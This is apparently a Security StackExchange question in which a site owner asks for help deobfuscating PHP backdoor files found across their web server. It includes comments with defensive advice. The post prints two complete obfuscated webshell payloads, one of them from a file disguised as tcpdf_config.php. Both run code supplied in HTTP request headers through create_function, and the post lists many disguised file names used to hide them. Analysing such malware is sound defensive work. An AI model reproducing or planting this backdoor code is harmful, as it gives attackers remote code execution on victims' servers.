# Deobfuscated Malicious PHP Code Comprehensively

Tags: passwords, php, attacks, injection, file-upload

I found 3 php files in a htaccess-password-protected upload folder on my server:

```
 1. default_folders.php
 2. factory.php
 3. HMAC.php
```

Each of them contains a variable string, eg:

```
$Ssy='XEYP'|~djJjLkpBgK4;$Virhp='I@$'|hD1;$Uu5f9="~5q=".h9weU."((6."^#x5VexmnkagI9a'.
     '4b.o7@((&G[aA';$nUv9CYo5id='@@DP'|HTTP;$ujR=UA|'J@';$kHr_tql='..n'^'vZ-';'rja'.
     'g J9XEmx7';$EhtjdM=Oe28.'~2'|'k!'.dE2t;$xQ8f8KBXUBG='w{{q{'._mqq&'i~~i{'./*uA'.
     '(cY*/_myw;$z5=AFD8SyFOB^'613W.&; >';$KNRdHxnCu7='{~o}v}'._ouosv.'}oo'&"{~"./*'.
     '^~kr*/uuww_o."}~k~ioo";$Q6Gzag3327='$'.UDH5b.' 51ZJ"BR@d K  `'.bbDPAHDY.#lSnw'.
     '^JB'|'"ED@4Q0T<ZC JQT +Lh.P3@@!'.YILHJPB;$P6JsS0J='t1r.tvW]^o{F{6nVI{'./*TfvX'.
     'a+?6g*/_MfOWqok.',~}{~w'&'Lyw;'.ZDRO_o.'}o{6|^|{~'.jVkvvEnmun.':jw';'zqJ5c9ES'.
     '^U>0h%';$E9LcuYx='r%x!ir~'.py4l5m^':q,y6*!/"}3y3';$hAbH8rvGS='%'|'1';$S5G='45'.
     '1 01#&'|'&0"83$12';$Xt8sci4vYB2=(ZAL^'ve|')|$Virhp;$yzPne79=$EhtjdM&(#hj53qX5'.
     'wu}on~'&'ww|g~v');$NazHNL=$xQ8f8KBXUBG&$z5;$r_Z08N=(sswo.'}'.e_fw.'~{|ko~'&/*'.
     'Z*/owwy.'}'.g_vw.'~{}yo~')&$KNRdHxnCu7;$EWPn=("!AS.-uG)Q8"^'@2!OT*)R<D')&('uX'.
     'r#$'.VGiN.'$'|'x"jC}'.Kembh);$qhdm0=$Q6Gzag3327^$P6JsS0J;$c0XPM9klj8q=/*PENSF'.
     'Ff0{Sn=*/$E9LcuYx&$Uu5f9;$Xt8sci4vYB2($yzPne79($nUv9CYo5id.$ujR))==$qhdm0;'zb'.
     'aQIqBuY';$NazHNL($r_Z08N(null,$yzPne79($c0XPM9klj8q)),$EWPn($hAbH8rvGS./*paAC'.
     'nu!A>*/$S5G,1,$kHr_tql));#wYq+l&fmIo6^{vCH;]A(Hq*&Os|8zIa.t<@7j=ff_u{=yS|lbd'.
     'Eo,_mx1mxlieUNG);1|}n<-)ne1S)[g&d0uKQ<[N_-Fvp{mz&gb58tVn.$g:!8I';
```

I've managed to deobfuscate partially:

```
md5(getenv(HTTP_A))=='bd6be7b8c52d1e82c46f684443e85d05';'zb'.
 'aQIqBuY';array_map(create_function(null,getenv("HTTP_X_MSISDN")),array_fill($hAbH8rvGS./*paAC'.
 'nu!A>*/65383536,1,$kHr_tql));#wYq+l&fmIo6^{vCH;]A(Hq*&Os|8zIa.t<@7j=ff_u{=yS|lbd'.
 'Eo,_mx1mxlieUNG);1|}n<-)ne1S)[g&d0uKQ<[N_-Fvp{mz&gb58tVn.$g:!8I';
```

**Does anyone know of a decoder for obfuscated php code that will work comprehensively?**
I have referenced similar source but didn't find them exceptionally helpful:

1. [Obfuscated php code found on server](https://security.stackexchange.com/questions/65939/obfuscated-php-code-found-on-the-server)
2. [What does this malicious PHP script do?](https://security.stackexchange.com/questions/86094/what-does-this-malicious-php-script-do)

---

### Update (23 April 2015)

I found that it's not just these 3 files, but **hundreds of files** infesting deep nested directories of my web server.

Here are some of the file names of malicious PHP codes:

```
1. tcpdf_config.php
2. config_seo.php
3. pcltrace.lib.php
4. router.php
5. tinymce.php
6. mailto.php
7. ParanoidHTTPFetcher.php
8. Parse.php
9. xml_domit_nodemaps.php 
10. xml_saxy_shared.php
11. Renderer.php
12. ShortModifiers.php
13. strcasecmp.php
14. xmlrpc_wrappers.php
15. Nonce.php
16. strspn.php
17. IPv6.php
18. php_file_utilities.php
19. php_http_status_codes.php
20. plupload.flash.swf

...
```

Sample code of `tcpdf_config.php`:

```
<?php
$FZbD8L='EGuiUTb'&~FmJmI8;$a6Kda1pMgq='$@L'|'(H@';$zMoimIc='" %7 !13 "F&$$D 2"(`  B0$$'.
        '004 $#'|'2"!#001 $"D60%F! #9d 0B43 100 $#';$RaNu0EH='w3?;7()+=Ld>1'.so23r.'(u'.
        'E;s$5=r07<vS'&'78'.uur1.':'.cwsx5.'{`"2>'.kkgv1f.'|}u=<?:fC';$hcu5kmqUf03=/*F'.
        '0c$*/H|'@';$wsWch_RLsj='ip`k;'^'=$04z';$F8Uqy6cUn=('O)dt{R'&'Jc/?KN')^(#kEGJJ'.
        'Mn "CK'^'t;'.vuey);$ll6pVdJQF=$a6Kda1pMgq^(mN9^',b@');$i8u=(mcUkn.'*'^#rot0G8'.
        '.&u/"H')|('>'.G94G9^'["'.MUeO);$Ldmr4vJuFCr=('V+'.Hz5qW.'-96ps$Z'^'7J$^'./*XW'.
        'rUPeh-vnb5*/uTeIIw6.'&@:')|('Os[P.4?c:'.jewD.'}'^'l3w<qE|&'.h5EV.'.^');$eE=(#'.
        '7H`44hE9!@{du1~'^'|h]d~5*'.bvk657.'|3')^('D)$'.YJPQQzsPn.'][J'^'l{|'./*rIn8Z9'.
        '1_r$R*/hthalX6.'~'.Kvyi);$drhyJoFD=$zMoimIc|$RaNu0EH;$BgP=(SLBvv.'(. ~b-'./*g'.
        '@rx%t*/O3nb.'$~'^'<:>$)sq]M-r"d%1q1')&('H]@'.HTlO.'@'.scWEBtSDf|XQV0_xUJ.'#EZ'.
        'M[]JD*');if($F8Uqy6cUn($ll6pVdJQF($i8u($hcu5kmqUf03.$wsWch_RLsj)),/*P2_kjjC2G'.
        '2]N]WvTS1:*/$drhyJoFD))exit;$Ldmr4vJuFCr($eE(false,$i8u($BgP)));#hT9e4H*2^BR'.
        'V+mUjM#N=8#zU ,Q1syDZ+b%a(K*+9F[NH~!ev|M~TyFuNXq%hMP&8T3';
```

and what I deobfuscate of it:

```
call_user_func(create_function(false, getenv('HTTP_X_H3G_MSISDN')));
```

I suspect this code has something to do with **mobile hacking**. And I am aware that the hacker could find this page easily by googling his own code.

My deobfuscating is still not comprehensive and I need advice on that. I want this post to offer a method of deobfuscating for other victims, then advise protection mechanisms.

Comment: possible duplicate of [What does this malicious PHP script do?](http://security.stackexchange.com/questions/86094/what-does-this-malicious-php-script-do)

Comment: While the exact script is likely different, [@armani's answer here](http://security.stackexchange.com/questions/86094/what-does-this-malicious-php-script-do/86095#86095) is an excellent view of how these scripts can be unraveled.

Comment: @gowenfawr Should we make a canonical answer?

Comment: hey, thanks for your inputs. I am unable to decode the obfuscated code still trying multiple online resources. Any advice?

Comment: @schroeder it's the best answer I've seen to that effect, so it would make sense to me.

Comment: I'm assuming that you truncated the code with `......` ?

Comment: If you truncate the code then how can we we possibly answer?

Comment: i wasn't sure if it's safe to put up. Will put it up now.

Comment: I think that the real correct answer here is to use a debugger and set a breakpoint on the `eval()` line. Then you can see the exact string that is going to be `eval()`'d. This is probably going to be a meta discussion about getting a canonical answer to this.

Comment: @JeffFerland I've put up the codes as requested. Please let me know if you are able to make sense of it as I can't.

Comment: Finding these files is pretty easy.  Script kiddies have some sort of sick fascination with base64 encoding (which actually makes finding their malware EASIER).  Base64 file content can be matched very quickly and recursively through an entire directory.  Attackers that don't use base64 encoding generally have a better chance of hiding their payloads such that they dodge heuristics more easily.  Still though, nothing dodges a good source control system.